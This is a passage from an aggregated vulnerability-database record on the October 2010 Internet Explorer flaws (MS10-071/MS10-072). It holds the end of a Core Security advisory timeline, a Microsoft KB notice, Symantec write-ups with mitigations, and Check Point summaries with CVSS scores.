for October but it will be shipping\r\nin the IE Cumulative Update scheduled for October.\r\n \r\n. 2010-10-01:\r\nCore acknowledges the MSRC's e-mail and notifies that although the\r\nproblem is located in IE-owned code, the problem also affects Office up\r\nto 2010. Core assumes this will be specified in the MSRC bulletin and\r\nasks for confirmation.\r\n \r\n. 2010-10-04:\r\nMSRC confirms that the description of the vulnerability calls out that\r\nthe vector to the vulnerability is through opening a word document.\r\n \r\n. 2010-10-12:\r\nAdvisory CORE-2010-0517 is published.\r\n \r\n \r\n9. *References*\r\n \r\n[1] Microsoft security bulletin summary for October 2010 -\r\n[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].\r\n[2] Office killbit [http://support.microsoft.com/kb/983632].\r\n[3] This bug was originally investigated in Microsoft Office by Core,\r\nbut MSRC determined [2010-07-02] that this bug is an exploitable crash\r\nin Internet Explorer.\r\n[4] MSRC was not able to reproduce this issue on IE6, however they\r\nnotifies the code has been determined to exist in this version and the\r\nfix will be scoped to address this platform as well.\r\n \r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\n[http://corelabs.coresecurity.com/].\r\n \r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\n[http://www.coresecurity.com].\r\n \r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\r\n \r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20184", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:40:42", "description": "<html><body><p>Describes the security update for Microsoft SharePoint that was released on October 12.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-072. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201010.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201010.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-072.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/ms10-072.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>For more information about this security update\u00a0and about any known issues with specific releases of this software, click the following article numbers to view the articles in the Microsoft Knowledge Base:\u00a0<ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2345212\" id=\"kb-link-8\">2345212 </a> MS10-072: Description of the security update for Office SharePoint Server 2007: October 12, 2010 </li><li><a href=\"https://support.microsoft.com/en-us/help/2345304\" id=\"kb-link-9\">2345304 </a> MS10-072: Description of the security update for Windows SharePoint Services 3.0: October 12, 2010 <br/><br/></li><li><a href=\"https://support.microsoft.com/en-us/help/2345322\" id=\"kb-link-10\">2345322 </a> MS10-072: Description of the security update for Microsoft SharePoint Foundation 2010: October 12, 2010 </li><li><a href=\"https://support.microsoft.com/en-us/help/2346298\" id=\"kb-link-11\">2346298 </a> MS10-072: Description of the security update for Microsoft Groove Server 2010: October 12, 2010 </li></ul></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-05-11T22:40:26", "type": "mskb", "title": "MS10-072: Vulnerabilities in Microsoft SharePoint could allow information disclosure", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3324", "CVE-2010-3243"], "modified": "2012-05-11T22:40:26", "id": "KB2412048", "href": "https://support.microsoft.com/en-us/help/2412048/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "symantec": [{"lastseen": "2021-06-08T18:47:50", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nExercise caution when handling files received from unfamiliar or suspicious sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Uninitialized Memory CVE-2010-3328 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3328"], "modified": "2010-10-12T00:00:00", "id": "SMNTC-43705", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/43705", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:47:48", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy. An attacker can exploit this issue to access content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nWhen possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Cross Domain CVE-2010-3330 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3330"], "modified": "2010-10-12T00:00:00", "id": "SMNTC-43709", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/43709", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:47:58", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nExercise caution when handling files received from unfamiliar or suspicious sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Uninitialized Memory CVE-2010-3331 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3331"], "modified": "2010-10-12T00:00:00", "id": "SMNTC-43707", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/43707", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:47:50", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nExercise caution when handling files received from unfamiliar or suspicious sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Uninitialized Memory CVE-2010-3326 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3326"], "modified": "2010-10-12T00:00:00", "id": "SMNTC-43696", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/43696", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:50:52", "description": "A use-after-free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted. A remote attacker could trigger this vulnerability by setting an unspecified property of a stylesheet object. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-01-28T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Rule Use After Free - Ver2 (CVE-2010-3328)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3328"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0090", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:35:26", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted. To trigger this issue, an attacker may create a malicious web page that will cause Internet Explorer to exit unexpectedly. Successful exploitation of this vulnerability will crash the browser, and may allow execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer CSS Rule Handling Memory Corruption (MS10-071; CVE-2010-3328)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3328"], "modified": "2015-05-04T00:00:00", "id": "CPAI-2010-287", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:34:39", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. To trigger this issue, an attacker may create a malicious Word file that will exploit this flaw within Internet Explorer. Successful exploitation may allow the attacker to take complete control of an affected system.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Uninitialized Memory Corruption (MS10-071; CVE-2010-3331)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3331"], "modified": "2015-11-09T00:00:00", "id": "CPAI-2010-272", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:49:46", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. To trigger this issue, an attacker may create a malicious Word file that will exploit this flaw within Internet Explorer. Successful exploitation may allow the attacker to take complete control of an affected system.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Uninitialized Memory Corruption (MS10-071) - Ver2 (CVE-2010-3331)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3331"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0741", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:33:55", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. An information disclosure vulnerability has been reported in the way that the toStaticHTML API sanitizes HTML. The vulnerability is due to the way that Internet Explorer handles content using specific strings when sanitizing HTML. To exploit this issue, an attacker must have the ability to submit a specially crafted script to a target site. Successful exploitation of this vulnerability could allow the attacker to execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer 8 toStaticHTML API Information Disclosure (MS10-072; CVE-2010-3243)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3243"], "modified": "2016-12-27T00:00:00", "id": "CPAI-2010-294", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-17T12:36:48", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. To trigger this issue, an attacker may create a malicious Word file that will exploit this flaw within Internet Explorer. Successful exploitation may allow the attacker to take complete control of an affected system.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer HtmlDlgHelper Class Memory Corruption (MS10-071; CVE-2010-3329)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-12T00:00:00", "id": "CPAI-2010-271", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:44:52", "description": "A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer HtmlDlgHelper Class Memory Corruption - Ver2 (CVE-2010-3329)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3329"], "modified": "2014-03-31T00:00:00", "id": "CPAI-2014-1205", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:36:47", "description": "CSS (Cascading Style Sheets) is a formatting method for Web pages using HTML. An information disclosure vulnerability has been reported in the way Microsoft Internet Explorer processes CSS special characters. The vulnerability is due to the way Internet Explorer improperly process CSS special characters. To trigger this issue, an attacker may create a malicious web page that will allow senstive data to be stolen. Successful exploitation of this vulnerability will enable the attacker to view content from another domain or Internet Explorer zone.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer CSS Special Character Information Disclosure (MS10-071; CVE-2010-3325)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3325"], "modified": "2010-10-12T00:00:00", "id": "CPAI-2010-284", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T12:34:00", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. An information disclosure vulnerability has been reported in the way that the toStaticHTML API sanitizes HTML. The vulnerability is due to the way that Internet Explorer handles content using specific strings when sanitizing HTML. To exploit this issue, an attacker must have the ability to submit a specially crafted script to a target site. Successful exploitation of this vulnerability could allow the attacker to execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer toStaticHTML API Cross-Site-Scripting (MS10-072; CVE-2010-3324)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3324"], "modified": "2016-12-19T00:00:00", "id": "CPAI-2010-293", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-17T12:36:29", "description": "Multiple memory corruption vulnerabilities have been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object that has not been initialized or has been deleted. To trigger this issue, an attacker may create a malicious web page that will cause Internet Explorer to exit unexpectedly. Successful exploitation of this vulnerability will crash the browser, and may allow execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2010-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Event Handling Memory Corruption (MS10-071; CVE-2010-3326)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3326"], "modified": "2018-05-23T00:00:00", "id": "CPAI-2010-286", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 